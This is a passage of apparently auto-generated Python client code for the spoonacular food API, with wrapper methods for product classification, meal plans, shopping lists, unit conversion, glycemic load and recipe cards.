"""Classify Grocery Product Bulk # noqa: E501
Provide a set of product jsons, get back classified products. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.classify_grocery_product_bulk_with_http_info(request_body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[object] request_body: (required)
:param str locale: The display name of the returned category, supported is en_US (for American English) and en_GB (for British English).
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['request_body', 'locale'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method classify_grocery_product_bulk" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'request_body' is set
if ('request_body' not in local_var_params or
local_var_params['request_body'] is None):
raise ApiValueError("Missing the required parameter `request_body` when calling `classify_grocery_product_bulk`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'locale' in local_var_params:
query_params.append(('locale', local_var_params['locale'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'request_body' in local_var_params:
body_params = local_var_params['request_body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/products/classifyBatch', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def clear_meal_plan_day(self, username, date, hash, inline_object10, **kwargs): # noqa: E501
"""Clear Meal Plan Day # noqa: E501
Delete all planned items from the user's meal plan for a specific day. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.clear_meal_plan_day(username, date, hash, inline_object10, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str username: The username. (required)
:param str date: The date in the format yyyy-mm-dd. (required)
:param str hash: The private hash for the username. (required)
:param InlineObject10 inline_object10: (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.clear_meal_plan_day_with_http_info(username, date, hash, inline_object10, **kwargs) # noqa: E501
else:
(data) = self.clear_meal_plan_day_with_http_info(username, date, hash, inline_object10, **kwargs) # noqa: E501
return data
def clear_meal_plan_day_with_http_info(self, username, date, hash, inline_object10, **kwargs): # noqa: E501
"""Clear Meal Plan Day # noqa: E501
Delete all planned items from the user's meal plan for a specific day. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.clear_meal_plan_day_with_http_info(username, date, hash, inline_object10, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str username: The username. (required)
:param str date: The date in the format yyyy-mm-dd. (required)
:param str hash: The private hash for the username. (required)
:param InlineObject10 inline_object10: (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['username', 'date', 'hash', 'inline_object10'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method clear_meal_plan_day" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'username' is set
if ('username' not in local_var_params or
local_var_params['username'] is None):
raise ApiValueError("Missing the required parameter `username` when calling `clear_meal_plan_day`") # noqa: E501
# verify the required parameter 'date' is set
if ('date' not in local_var_params or
local_var_params['date'] is None):
raise ApiValueError("Missing the required parameter `date` when calling `clear_meal_plan_day`") # noqa: E501
# verify the required parameter 'hash' is set
if ('hash' not in local_var_params or
local_var_params['hash'] is None):
raise ApiValueError("Missing the required parameter `hash` when calling `clear_meal_plan_day`") # noqa: E501
# verify the required parameter 'inline_object10' is set
if ('inline_object10' not in local_var_params or
local_var_params['inline_object10'] is None):
raise ApiValueError("Missing the required parameter `inline_object10` when calling `clear_meal_plan_day`") # noqa: E501
collection_formats = {}
path_params = {}
if 'username' in local_var_params:
path_params['username'] = local_var_params['username'] # noqa: E501
if 'date' in local_var_params:
path_params['date'] = local_var_params['date'] # noqa: E501
query_params = []
if 'hash' in local_var_params:
query_params.append(('hash', local_var_params['hash'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'inline_object10' in local_var_params:
body_params = local_var_params['inline_object10']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/mealplanner/{username}/day/{date}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def compute_glycemic_load(self, body, **kwargs): # noqa: E501
"""Compute Glycemic Load # noqa: E501
Retrieve the glycemic index for a list of ingredients and compute the individual and total glycemic load. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.compute_glycemic_load(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param object body: (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.compute_glycemic_load_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.compute_glycemic_load_with_http_info(body, **kwargs) # noqa: E501
return data
def compute_glycemic_load_with_http_info(self, body, **kwargs): # noqa: E501
"""Compute Glycemic Load # noqa: E501
Retrieve the glycemic index for a list of ingredients and compute the individual and total glycemic load. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.compute_glycemic_load_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param object body: (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method compute_glycemic_load" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in local_var_params or
local_var_params['body'] is None):
raise ApiValueError("Missing the required parameter `body` when calling `compute_glycemic_load`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/ingredients/glycemicLoad', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def connect_user(self, body, **kwargs): # noqa: E501
"""Connect User # noqa: E501
In order to call user-specific endpoints, you need to connect your app's users to spoonacular users. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.connect_user(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param object body: (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.connect_user_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.connect_user_with_http_info(body, **kwargs) # noqa: E501
return data
def connect_user_with_http_info(self, body, **kwargs): # noqa: E501
"""Connect User # noqa: E501
In order to call user-specific endpoints, you need to connect your app's users to spoonacular users. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.connect_user_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param object body: (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method connect_user" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in local_var_params or
local_var_params['body'] is None):
raise ApiValueError("Missing the required parameter `body` when calling `connect_user`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/users/connect', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def convert_amounts(self, ingredient_name, source_amount, source_unit, target_unit, **kwargs): # noqa: E501
"""Convert Amounts # noqa: E501
Convert amounts like \"2 cups of flour to grams\". # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.convert_amounts(ingredient_name, source_amount, source_unit, target_unit, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str ingredient_name: The ingredient which you want to convert. (required)
:param float source_amount: The amount from which you want to convert, e.g. the 2.5 in \"2.5 cups of flour to grams\". (required)
:param str source_unit: The unit from which you want to convert, e.g. the grams in \"2.5 cups of flour to grams\". You can also use \"piece\", e.g. \"3.4 oz tomatoes to piece\" (required)
:param str target_unit: The unit to which you want to convert, e.g. the grams in \"2.5 cups of flour to grams\". You can also use \"piece\", e.g. \"3.4 oz tomatoes to piece\" (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.convert_amounts_with_http_info(ingredient_name, source_amount, source_unit, target_unit, **kwargs) # noqa: E501
else:
(data) = self.convert_amounts_with_http_info(ingredient_name, source_amount, source_unit, target_unit, **kwargs) # noqa: E501
return data
def convert_amounts_with_http_info(self, ingredient_name, source_amount, source_unit, target_unit, **kwargs): # noqa: E501
"""Convert Amounts # noqa: E501
Convert amounts like \"2 cups of flour to grams\". # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.convert_amounts_with_http_info(ingredient_name, source_amount, source_unit, target_unit, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str ingredient_name: The ingredient which you want to convert. (required)
:param float source_amount: The amount from which you want to convert, e.g. the 2.5 in \"2.5 cups of flour to grams\". (required)
:param str source_unit: The unit from which you want to convert, e.g. the grams in \"2.5 cups of flour to grams\". You can also use \"piece\", e.g. \"3.4 oz tomatoes to piece\" (required)
:param str target_unit: The unit to which you want to convert, e.g. the grams in \"2.5 cups of flour to grams\". You can also use \"piece\", e.g. \"3.4 oz tomatoes to piece\" (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['ingredient_name', 'source_amount', 'source_unit', 'target_unit'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method convert_amounts" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'ingredient_name' is set
if ('ingredient_name' not in local_var_params or
local_var_params['ingredient_name'] is None):
raise ApiValueError("Missing the required parameter `ingredient_name` when calling `convert_amounts`") # noqa: E501
# verify the required parameter 'source_amount' is set
if ('source_amount' not in local_var_params or
local_var_params['source_amount'] is None):
raise ApiValueError("Missing the required parameter `source_amount` when calling `convert_amounts`") # noqa: E501
# verify the required parameter 'source_unit' is set
if ('source_unit' not in local_var_params or
local_var_params['source_unit'] is None):
raise ApiValueError("Missing the required parameter `source_unit` when calling `convert_amounts`") # noqa: E501
# verify the required parameter 'target_unit' is set
if ('target_unit' not in local_var_params or
local_var_params['target_unit'] is None):
raise ApiValueError("Missing the required parameter `target_unit` when calling `convert_amounts`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'ingredient_name' in local_var_params:
query_params.append(('ingredientName', local_var_params['ingredient_name'])) # noqa: E501
if 'source_amount' in local_var_params:
query_params.append(('sourceAmount', local_var_params['source_amount'])) # noqa: E501
if 'source_unit' in local_var_params:
query_params.append(('sourceUnit', local_var_params['source_unit'])) # noqa: E501
if 'target_unit' in local_var_params:
query_params.append(('targetUnit', local_var_params['target_unit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/convert', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def create_recipe_card(self, title, image, ingredients, instructions, ready_in_minutes, servings, mask, background_image, **kwargs): # noqa: E501
"""Create Recipe Card # noqa: E501
Generate a recipe card for a recipe. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_recipe_card(title, image, ingredients, instructions, ready_in_minutes, servings, mask, background_image, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str title: The title of the recipe. (required)
:param file image: The binary image of the recipe as jpg. (required)
:param str ingredients: The ingredient list of the recipe, one ingredient per line (separate lines with \\\\n). (required)
:param str instructions: The instructions to make the recipe. One step per line (separate lines with \\\\n). (required)
:param float ready_in_minutes: The number of minutes it takes to get the recipe on the table. (required)
:param float servings: The number of servings the recipe makes. (required)
:param str mask: The mask to put over the recipe image (\\\"ellipseMask\\\", \\\"diamondMask\\\", \\\"starMask\\\", \\\"heartMask\\\", \\\"potMask\\\", \\\"fishMask\\\"). (required)
:param str background_image: The background image (\\\"none\\\",\\\"background1\\\", or \\\"background2\\\"). (required)
:param str author: The author of the recipe.
:param str background_color: The background color for the recipe card as a hex-string.
:param str font_color: The font color for the recipe card as a hex-string.
:param str source: The source of the recipe.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_recipe_card_with_http_info(title, image, ingredients, instructions, ready_in_minutes, servings, mask, background_image, **kwargs) # noqa: E501
else:
(data) = self.create_recipe_card_with_http_info(title, image, ingredients, instructions, ready_in_minutes, servings, mask, background_image, **kwargs) # noqa: E501
return data
def create_recipe_card_with_http_info(self, title, image, ingredients, instructions, ready_in_minutes, servings, mask, background_image, **kwargs): # noqa: E501
"""Create Recipe Card # noqa: E501
Generate a recipe card for a recipe. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_recipe_card_with_http_info(title, image, ingredients, instructions, ready_in_minutes, servings, mask, background_image, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str title: The title of the recipe. (required)
:param file image: The binary image of the recipe as jpg. (required)
:param str ingredients: The ingredient list of the recipe, one ingredient per line (separate lines with \\\\n). (required)
:param str instructions: The instructions to make the recipe. One step per line (separate lines with \\\\n). (required)
:param float ready_in_minutes: The number of minutes it takes to get the recipe on the table. (required)
:param float servings: The number of servings the recipe makes. (required)
:param str mask: The mask to put over the recipe image (\\\"ellipseMask\\\", \\\"diamondMask\\\", \\\"starMask\\\", \\\"heartMask\\\", \\\"potMask\\\", \\\"fishMask\\\"). (required)
:param str background_image: The background image (\\\"none\\\",\\\"background1\\\", or \\\"background2\\\"). (required)
:param str author: The author of the recipe.
:param str background_color: The background color for the recipe card as a hex-string.
:param str font_color: The font color for the recipe card as a hex-string.
:param str source: The source of the recipe.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['title', 'image', 'ingredients', 'instructions', 'ready_in_minutes', 'servings', 'mask', 'background_image', 'author', 'background_color', 'font_color', 'source'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_recipe_card" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'title' is set
if ('title' not in local_var_params or
local_var_params['title'] is None):
raise ApiValueError("Missing the required parameter `title` when calling `create_recipe_card`") # noqa: E501
# verify the required parameter 'image' is set
if ('image' not in local_var_params or
local_var_params['image'] is None):
raise ApiValueError("Missing the required parameter `image` when calling `create_recipe_card`") # noqa: E501
# verify the required parameter 'ingredients' is set
if ('ingredients' not in local_var_params or
local_var_params['ingredients'] is None):
raise ApiValueError("Missing the required parameter `ingredients` when calling `create_recipe_card`") # noqa: E501
# verify the required parameter 'instructions' is set
if ('instructions' not in local_var_params or
local_var_params['instructions'] is None):
raise ApiValueError("Missing the required parameter `instructions` when calling `create_recipe_card`") # noqa: E501
# verify the required parameter 'ready_in_minutes' is set
if ('ready_in_minutes' not in local_var_params or
local_var_params['ready_in_minutes'] is None):
raise ApiValueError("Missing the required parameter `ready_in_minutes` when calling `create_recipe_card`") # noqa: E501
# verify the required parameter 'servings' is set
if ('servings' not in local_var_params or
local_var_params['servings'] is None):
raise ApiValueError("Missing the required parameter `servings` when calling `create_recipe_card`") # noqa: E501
# verify the required parameter 'mask' is set
if ('mask' not in local_var_params or
local_var_params['mask'] is None):
raise ApiValueError("Missing the required parameter `mask` when calling `create_recipe_card`") # noqa: E501
# verify the required parameter 'background_image' is set
if ('background_image' not in local_var_params or
local_var_params['background_image'] is None):
raise ApiValueError("Missing the required parameter `background_image` when calling `create_recipe_card`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'title' in local_var_params:
form_params.append(('title', local_var_params['title'])) # noqa: E501
if 'image' in local_var_params:
local_var_files['image'] = local_var_params['image'] # noqa: E501
if 'ingredients' in local_var_params:
form_params.append(('ingredients', local_var_params['ingredients'])) # noqa: E501
if 'instructions' in local_var_params:
form_params.append(('instructions', local_var_params['instructions'])) # noqa: E501
if 'ready_in_minutes' in local_var_params:
form_params.append(('readyInMinutes', local_var_params['ready_in_minutes'])) # noqa: E501
if 'servings' in local_var_params:
form_params.append(('servings', local_var_params['servings'])) # noqa: E501
if 'mask' in local_var_params:
form_params.append(('mask', local_var_params['mask'])) # noqa: E501
if 'background_image' in local_var_params:
form_params.append(('backgroundImage', local_var_params['background_image'])) # noqa: E501
if 'author' in local_var_params:
form_params.append(('author', local_var_params['author'])) # noqa: E501
if 'background_color' in local_var_params:
form_params.append(('backgroundColor', local_var_params['background_color'])) # noqa: E501
if 'font_color' in local_var_params:
form_params.append(('fontColor', local_var_params['font_color'])) # noqa: E501
if 'source' in local_var_params:
form_params.append(('source', local_var_params['source'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['multipart/form-data']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/visualizeRecipe', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_from_meal_plan(self, username, id, hash, inline_object12, **kwargs):  # noqa: E501
    """Delete from Meal Plan  # noqa: E501

    Delete an item from the user's meal plan.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.delete_from_meal_plan(username, id, hash, inline_object12, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str username: The username. (required)
    :param float id: The shopping list item id. (required)
    :param str hash: The private hash for the username. (required)
    :param InlineObject12 inline_object12: (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper always discards status code and headers.
    kwargs['_return_http_data_only'] = True
    # The *_with_http_info variant handles both the synchronous and the
    # async_req=True (thread-returning) cases, so simply delegate.
    return self.delete_from_meal_plan_with_http_info(username, id, hash, inline_object12, **kwargs)  # noqa: E501
def delete_from_meal_plan_with_http_info(self, username, id, hash, inline_object12, **kwargs):  # noqa: E501
    """Delete from Meal Plan  # noqa: E501

    Delete an item from the user's meal plan.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.delete_from_meal_plan_with_http_info(username, id, hash, inline_object12, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str username: The username. (required)
    :param float id: The shopping list item id. (required)
    :param str hash: The private hash for the username. (required)
    :param InlineObject12 inline_object12: (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # locals() must be snapshotted first: it captures exactly the named
    # parameters (plus 'kwargs') before any other local is created.
    local_var_params = locals()

    all_params = ['username', 'id', 'hash', 'inline_object12']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Reject unknown keyword arguments, then merge the accepted ones
    # into local_var_params alongside the positional parameters.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_from_meal_plan" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'username' is set
    if ('username' not in local_var_params or
            local_var_params['username'] is None):
        raise ApiValueError("Missing the required parameter `username` when calling `delete_from_meal_plan`")  # noqa: E501
    # verify the required parameter 'id' is set
    if ('id' not in local_var_params or
            local_var_params['id'] is None):
        raise ApiValueError("Missing the required parameter `id` when calling `delete_from_meal_plan`")  # noqa: E501
    # verify the required parameter 'hash' is set
    if ('hash' not in local_var_params or
            local_var_params['hash'] is None):
        raise ApiValueError("Missing the required parameter `hash` when calling `delete_from_meal_plan`")  # noqa: E501
    # verify the required parameter 'inline_object12' is set
    if ('inline_object12' not in local_var_params or
            local_var_params['inline_object12'] is None):
        raise ApiValueError("Missing the required parameter `inline_object12` when calling `delete_from_meal_plan`")  # noqa: E501

    collection_formats = {}

    # Path placeholders {username} and {id} in the endpoint URL.
    path_params = {}
    if 'username' in local_var_params:
        path_params['username'] = local_var_params['username']  # noqa: E501
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']  # noqa: E501

    query_params = []
    if 'hash' in local_var_params:
        query_params.append(('hash', local_var_params['hash']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    # The inline object is sent as the request body (JSON-serialized by
    # the api_client).
    body_params = None
    if 'inline_object12' in local_var_params:
        body_params = local_var_params['inline_object12']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    # NOTE(review): the generated spec supplies an empty Content-Type
    # candidate list for this operation -- generator artifact, verify.
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        [''])  # noqa: E501

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/mealplanner/{username}/items/{id}', 'DELETE',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def delete_from_shopping_list(self, username, id, hash, inline_object15, **kwargs):  # noqa: E501
    """Delete from Shopping List  # noqa: E501

    Delete an item from the current shopping list of the user.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.delete_from_shopping_list(username, id, hash, inline_object15, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str username: The username. (required)
    :param float id: The shopping list item id. (required)
    :param str hash: The private hash for the username. (required)
    :param InlineObject15 inline_object15: (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper always discards status code and headers.
    kwargs['_return_http_data_only'] = True
    # The *_with_http_info variant handles both the synchronous and the
    # async_req=True (thread-returning) cases, so simply delegate.
    return self.delete_from_shopping_list_with_http_info(username, id, hash, inline_object15, **kwargs)  # noqa: E501
def delete_from_shopping_list_with_http_info(self, username, id, hash, inline_object15, **kwargs):  # noqa: E501
    """Delete from Shopping List  # noqa: E501

    Delete an item from the current shopping list of the user.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.delete_from_shopping_list_with_http_info(username, id, hash, inline_object15, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str username: The username. (required)
    :param float id: The shopping list item id. (required)
    :param str hash: The private hash for the username. (required)
    :param InlineObject15 inline_object15: (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # locals() must be snapshotted first: it captures exactly the named
    # parameters (plus 'kwargs') before any other local is created.
    local_var_params = locals()

    all_params = ['username', 'id', 'hash', 'inline_object15']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Reject unknown keyword arguments, then merge the accepted ones
    # into local_var_params alongside the positional parameters.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_from_shopping_list" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'username' is set
    if ('username' not in local_var_params or
            local_var_params['username'] is None):
        raise ApiValueError("Missing the required parameter `username` when calling `delete_from_shopping_list`")  # noqa: E501
    # verify the required parameter 'id' is set
    if ('id' not in local_var_params or
            local_var_params['id'] is None):
        raise ApiValueError("Missing the required parameter `id` when calling `delete_from_shopping_list`")  # noqa: E501
    # verify the required parameter 'hash' is set
    if ('hash' not in local_var_params or
            local_var_params['hash'] is None):
        raise ApiValueError("Missing the required parameter `hash` when calling `delete_from_shopping_list`")  # noqa: E501
    # verify the required parameter 'inline_object15' is set
    if ('inline_object15' not in local_var_params or
            local_var_params['inline_object15'] is None):
        raise ApiValueError("Missing the required parameter `inline_object15` when calling `delete_from_shopping_list`")  # noqa: E501

    collection_formats = {}

    # Path placeholders {username} and {id} in the endpoint URL.
    path_params = {}
    if 'username' in local_var_params:
        path_params['username'] = local_var_params['username']  # noqa: E501
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']  # noqa: E501

    query_params = []
    if 'hash' in local_var_params:
        query_params.append(('hash', local_var_params['hash']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    # The inline object is sent as the request body (JSON-serialized by
    # the api_client).
    body_params = None
    if 'inline_object15' in local_var_params:
        body_params = local_var_params['inline_object15']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    # NOTE(review): the generated spec supplies an empty Content-Type
    # candidate list for this operation -- generator artifact, verify.
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        [''])  # noqa: E501

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/mealplanner/{username}/shopping-list/items/{id}', 'DELETE',
